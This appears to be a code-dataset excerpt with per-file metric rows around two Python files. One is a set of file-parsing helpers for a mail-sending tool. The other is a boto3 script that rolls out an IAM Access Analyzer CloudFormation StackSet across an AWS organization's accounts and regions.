| 31.101852 | 88 | 0.646621 | 355 | 3,359 | 5.822535 | 0.216901 | 0.10837 | 0.087083 | 0.063861 | 0.473633 | 0.352201 | 0.303822 | 0.259313 | 0.19642 | 0.057088 | 0 | 0.009604 | 0.256029 | 3,359 | 107 | 89 | 31.392523 | 0.817527 | 0 | 0 | 0.304878 | 0 | 0 | 0.173564 | 0.04287 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085366 | false | 0 | 0.060976 | 0.02439 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
141e2840866cc4a5199ed1f46de24c5823d73ae2 | 940 | py | Python | sendmail/helpers.py | hmif-itb/hmif-send-mail | 628e283d7de06b132fe72af97b76104ea5ff8c88 | [
"MIT"
] | null | null | null | sendmail/helpers.py | hmif-itb/hmif-send-mail | 628e283d7de06b132fe72af97b76104ea5ff8c88 | [
"MIT"
] | null | null | null | sendmail/helpers.py | hmif-itb/hmif-send-mail | 628e283d7de06b132fe72af97b76104ea5ff8c88 | [
"MIT"
] | null | null | null | import json
import yaml
import csv
def file_to_raw(filename):
with open(filename, "r") as file:
f = file.read()
return f
def dump_to_json(data, filename):
with open(filename, "w", encoding="utf8") as file:
json.dump(data, file, ensure_ascii=False)
def read_csv(filename):
rows = []
with open(filename, newline="") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",", quotechar=" ")
for row in csv_reader:
rows.append(row)
return rows
def get_csv_headers(filename):
with open(filename, newline="") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",", quotechar=" ")
for row in csv_reader:
return row
def yaml_parser(yaml_file):
with open(yaml_file, "r") as stream:
try:
data = yaml.safe_load(stream)
return data
except yaml.YAMLError as exc:
print(exc)
| 23.5 | 71 | 0.611702 | 127 | 940 | 4.370079 | 0.346457 | 0.097297 | 0.115315 | 0.12973 | 0.331532 | 0.331532 | 0.331532 | 0.331532 | 0.331532 | 0.331532 | 0 | 0.001471 | 0.276596 | 940 | 39 | 72 | 24.102564 | 0.814706 | 0 | 0 | 0.206897 | 0 | 0 | 0.011702 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0 | 0.103448 | 0 | 0.413793 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
141e6c1e91f0326ea6e6f4822ced15004bab074a | 2,828 | py | Python | access-analyzer/enablement/create-account-analyzer-stack-set.py | lulukelu/aws-iam-permissions-guardrails | cae485e3d8589c85f55c50c442ce47916345e00d | [
"Apache-2.0"
] | 88 | 2020-04-02T02:56:27.000Z | 2022-03-18T13:22:02.000Z | access-analyzer/enablement/create-account-analyzer-stack-set.py | lulukelu/aws-iam-permissions-guardrails | cae485e3d8589c85f55c50c442ce47916345e00d | [
"Apache-2.0"
] | 45 | 2020-06-26T11:11:28.000Z | 2021-08-17T15:31:47.000Z | access-analyzer/enablement/create-account-analyzer-stack-set.py | lulukelu/aws-iam-permissions-guardrails | cae485e3d8589c85f55c50c442ce47916345e00d | [
"Apache-2.0"
] | 32 | 2020-04-02T02:56:28.000Z | 2021-12-20T18:53:04.000Z | import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import argparse
import boto3
from botocore.waiter import SingleWaiterConfig, Waiter
excluded_regions=[]
parser = argparse.ArgumentParser()
parser.add_argument("--excluded_regions","-excluded_regions",help="Regions to exclude as comma separated list, such as those not activate by your organization and unable to deploy",required=False)
args = parser.parse_args()
logger.info(f"args {args}")
if args.excluded_regions:
logger.info(f"Excluded regions are: {args.excluded_regions}")
excluded_regions=args.excluded_regions.split(",")
waiter_config = SingleWaiterConfig({
'delay': 10,
'operation': 'DescribeStackSetOperation',
'maxAttempts': 360,
'acceptors': [
{
'argument': 'StackSetOperation.Status',
'expected': 'SUCCEEDED',
'matcher': 'path',
'state': 'success'
},
{
'argument': 'StackSetOperation.Status',
'expected': 'FAILED',
'matcher': 'path',
'state': 'failure'
},
{
'argument': 'StackSetOperation.Status',
'expected': 'STOPPED',
'matcher': 'path',
'state': 'failure'
},
{
'expected': 'ValidationError',
'matcher': 'error',
'state': 'failure'
}
]
})
cloudformation_client=boto3.client("cloudformation")
cfn=None
with open('account-analyzer.yaml', 'r') as myfile:
cfn = myfile.read()
StackSetName="access-analyzer-account"
response=cloudformation_client.create_stack_set(
StackSetName=StackSetName,
Description="Access Analyzer Account",
TemplateBody=cfn,
Capabilities=["CAPABILITY_IAM","CAPABILITY_NAMED_IAM"],
PermissionModel='SERVICE_MANAGED',
#AdministrationRoleARN='AWSControlTowerStackSetRole',
#ExecutionRoleName='AWSControlTowerExecution',
AutoDeployment={
'Enabled':True,
'RetainStacksOnAccountRemoval': False
}
)
stack_set_id=response['StackSetId']
print("Stack Set Id is {}".format((stack_set_id)))
organizations_client=boto3.client('organizations')
root_id = organizations_client.list_roots()['Roots'][0]['Id']
waiter = Waiter('StackSetOperationComplete', waiter_config, cloudformation_client.describe_stack_set_operation)
ec2_client = boto3.client('ec2')
all_regions = [region['RegionName'] for region in ec2_client.describe_regions()['Regions']]
for region in excluded_regions:
all_regions.remove(region)
response=cloudformation_client.create_stack_instances(
StackSetName=StackSetName,
DeploymentTargets={
'OrganizationalUnitIds':[root_id]
},
Regions=all_regions,
OperationPreferences={
'FailureToleranceCount': 1,
'MaxConcurrentCount': 10
}
)
operation_id=response['OperationId']
print("Create Stack Instances Operation Id is {}".format((operation_id)))
waiter.wait(
StackSetName=StackSetName,
OperationId=operation_id
)
| 26.933333 | 196 | 0.726308 | 284 | 2,828 | 7.073944 | 0.443662 | 0.067198 | 0.028372 | 0.058238 | 0.038825 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006582 | 0.140382 | 2,828 | 104 | 197 | 27.192308 | 0.819827 | 0.0343 | 0 | 0.139535 | 0 | 0 | 0.326979 | 0.094941 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.046512 | 0 | 0.046512 | 0.023256 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |